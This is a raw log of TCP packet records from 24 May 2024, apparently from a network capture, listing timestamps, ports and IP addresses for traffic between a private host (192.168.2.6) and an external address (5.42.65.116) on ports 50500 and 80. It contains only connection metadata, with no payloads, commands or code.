May 24, 2024 00:22:00.921323061 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921366930 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921405077 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921433926 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921447039 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921484947 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921545029 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921574116 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921585083 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921602011 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921623945 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921644926 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921663046 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921701908 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921722889 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921739101 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921758890 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921777964 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921804905 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921817064 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921829939 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921854973 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921876907 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921892881 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921930075 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921957970 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.921969891 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.921993017 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922008038 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922025919 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922045946 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922084093 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922106981 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922118902 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922142982 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922157049 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922183037 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922195911 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922234058 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922261953 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922811985 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922856092 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922894955 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922923088 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922934055 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922955036 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.922971964 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.922992945 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923012018 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923048973 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923068047 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923086882 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923108101 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923125982 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923136950 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923166037 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923202991 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923228025 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923243046 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923260927 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923280954 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923304081 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923321009 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923341990 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923361063 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923376083 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923398018 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923434973 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923464060 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923472881 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923501015 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923511982 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923530102 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923552990 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923589945 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.923613071 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.923645020 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924403906 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924448967 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924485922 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924518108 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924525023 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924562931 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924562931 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924591064 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924603939 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924616098 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924642086 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924666882 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924684048 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924720049 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924721956 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924746037 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924760103 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924772024 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924798012 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924815893 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924837112 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924875975 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924905062 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924915075 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924938917 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924956083 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.924964905 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.924993992 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925007105 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925034046 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925060987 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925071955 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925086021 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925110102 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925127983 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925148010 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925178051 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925187111 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925209045 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925225973 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925251961 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925277948 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925834894 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925879955 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925899982 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925925970 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.925950050 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.925966978 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926003933 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926040888 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926078081 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926115990 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926151991 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926188946 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926227093 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926264048 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926300049 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926337957 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926373959 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926410913 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926448107 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926500082 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926536083 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926573038 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926609039 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.926645041 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927387953 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927433014 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927470922 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927508116 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927545071 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927582026 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927618027 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927654982 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927691936 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927728891 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927766085 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927803040 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927839994 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927875996 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927912951 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927948952 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.927985907 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928023100 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928059101 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928096056 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928133011 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928169012 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928208113 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928245068 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928282976 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928323030 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928364038 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928401947 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928438902 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928476095 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928513050 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928550005 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928587914 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928625107 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928662062 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928698063 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928735018 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928771019 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928807974 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928843975 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928880930 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928916931 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.928953886 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930373907 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930401087 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930416107 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930433035 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930449009 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930464029 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930486917 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930512905 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930530071 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930545092 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930561066 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930577040 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930587053 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930598974 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930608034 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930619955 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930629015 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930639029 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930654049 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930663109 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930670977 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930684090 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930692911 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930702925 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930713892 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930726051 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930737019 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930747032 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930757999 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.930767059 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.935167074 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.935179949 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.935192108 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.935201883 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.935214043 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.935224056 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.935235023 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.935245037 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.987303019 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:01.358424902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:01.363368988 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:01.363449097 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:01.363991976 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:01.415607929 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:01.482311010 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:01.497183084 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.021457911 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.021532059 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.023130894 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.076945066 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.268306971 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.268378019 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.268743038 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.268826008 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.269654036 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.269721031 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.270967960 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.270982981 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.271039963 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.271063089 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.273716927 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.273730040 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.273797989 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.276160002 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.276173115 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.276181936 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.276278973 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.276278973 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.278719902 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.278733015 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.278742075 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.278815031 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.278815031 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.371674061 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.371808052 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.372314930 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.372386932 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.373317003 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.373476028 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.374351978 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.374365091 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.374376059 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.374418974 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.374418974 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.376471043 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.376656055 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.377545118 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.377558947 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.378066063 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.379478931 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.379492998 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.379542112 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.379542112 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.381680012 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.381694078 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.381736994 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.381736994 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.383430958 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.383445024 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.383455992 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.383497953 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.383497953 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.388317108 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.388329983 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.388341904 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.388354063 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.388406992 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.388406992 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.388468981 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.388482094 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.388513088 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.431289911 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.431365967 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.469316006 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.469598055 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.469621897 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.469657898 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.470459938 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.470551014 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.471376896 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.471391916 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.471441031 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.471441031 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.473139048 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.473227978 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.474075079 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.474090099 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.474101067 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.474139929 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.474199057 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.475873947 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.475888014 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.475939989 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.477663994 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.477678061 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.477721930 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.477752924 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.479455948 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.479470968 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.479518890 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.479518890 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.480865955 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.480880022 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.480926991 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.480926991 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.482306004 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.482321024 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.482331991 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.482378006 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.482378006 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.483743906 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.483757973 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.483810902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.483810902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.485214949 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.485229015 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.486221075 CEST	49714	80	192.168.2.6	5.42.65.116
